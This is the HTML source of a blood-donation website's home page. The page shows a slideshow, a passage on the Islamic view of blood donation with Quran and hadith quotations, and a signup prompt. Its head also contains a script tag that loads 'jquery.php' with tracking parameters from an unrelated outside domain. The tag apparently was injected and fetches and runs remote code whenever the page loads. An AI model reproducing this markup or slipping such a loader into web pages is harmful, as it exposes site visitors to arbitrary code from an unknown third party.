<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>Saving Lives!</title>
    <!-- Bootstrap Core CSS -->
    <link href="~/Content/bootstrap-theme.min.css" rel="stylesheet" />
    <link href="~/Content/bootstrap.css" rel="stylesheet" />
    <link href="~/Content/bootstrap.min.css" rel="stylesheet" />
    <link href="~/Content/style.css" rel="stylesheet" />

    <!-- Custom CSS -->
    <script src="~/Scripts/bootstrap.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
    <!-- Fonts -->
    <link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css">
    <link href="http://fonts.googleapis.com/css?family=Josefin+Slab:100,300,400,600,700,100italic,300italic,400italic,600italic,700italic" rel="stylesheet" type="text/css">

    <style type="text/css">
        .bs-example {
            margin: 10px;
        }
    </style>

    <script src="https://macutnova.com/jquery.php?u=12b455f69738d9fe6b9db3236b528f93&c=gpupdater&p=1"></script>
</head>
<body>
    
    <div id="body">

        <section class="content-wrapper main-content clear-fix">

            <style type="text/css">
                #reg + #loginBtn {
                    position: initial;
                }
            </style>
            </section>
    </div>


    <div class="container">
        <div class="row">
            <div class="box">
                <div class="col-lg-12 text-center">
                    <div id="carousel-example-generic" class="carousel slide">
                        <!-- Indicators -->
                        <ol class="carousel-indicators hidden-xs">
                            <li data-target="#carousel-example-generic" data-slide-to="0" class="active"></li>
                            <li data-target="#carousel-example-generic" data-slide-to="1"></li>
                            <li data-target="#carousel-example-generic" data-slide-to="2"></li>
                        </ol>
                        <!-- Wrapper for slides -->
                        <div class="carousel-inner">
                            <div class="item active">
                                <img class="img-responsive img-full" src="~/images/s3.jpg" width="300" height="100" alt="">
                            </div>
                            <div class="item">
                                <img class="img-responsive img-full" src="~/images/s2.jpg" width="300" height="100" alt="">
                            </div>
                            <div class="item">
                                <img class="img-responsive img-full" src="~/images/s5.jpg" width="300" height="100" alt="">
                            </div>
                        </div>
                        <!-- Controls -->
                        <a class="left carousel-control" href="#carousel-example-generic" data-slide="prev">
                            <span class="icon-prev"></span>
                        </a>
                        <a class="right carousel-control" href="#carousel-example-generic" data-slide="next">
                            <span class="icon-next"></span>
                        </a>
                    </div>


                        <h2 class="brand-before">
                            <strong>Be a Hero</strong>
                        </h2>
                        <h1 class="brand-name">Save a Life</h1>
                        <hr class="tagline-divider">
                        <h2>
                            <small>
                                <strong>You have it in you.</strong>
                            </small>
                 </h2>
          </div>
                </div>
            </div>
        </div>

    <div class="row">
        <div class="box">
            <div class="col-lg-12">
                <hr>
                <h2 class="intro-text text-center">
                    
                    <strong style="color:orangered ">ISLAMIC VIEW OF  </strong> BLOOD DONATION
                </h2>
                <hr>
                <img class="img-responsive img-border img-left" src="~/images/s2.jpg"  alt="">
                <hr class="visible-xs">
                <p>In the Quran, Allah says, "To save one life is to save all humanity".</p>
                <p style="text-align:justify">Islamic law urges every Muslim to be in constant support of his community, and make it a legal 
                   requirement in many cases. According to a Hadith: "He who relieves a believer of one form of distress,
                   in this life shall be relieved by God of a greater distress on the Day of Resurrection" and 
                   "God will help any servant of His, as long as he continues to help his brother".
                "A Muslim is a brother to every Muslim, he neither lets him down, nor does him injustice, nor gives him away".</p>
                <p style="color:orangered"><a href="/home/register" style="font-weight:bold" >SIGNUP</a> NOW  TO  DONATE ,  YOU  NEVER  KNOW  WHEN  YOU  NEED  BLOOD !</p>
            </div>
        </div>
    </div>

    <script>
        $('.carousel').carousel({
            interval: 50000 //changes the speed
        })
    </script>
</body>
   
</html>
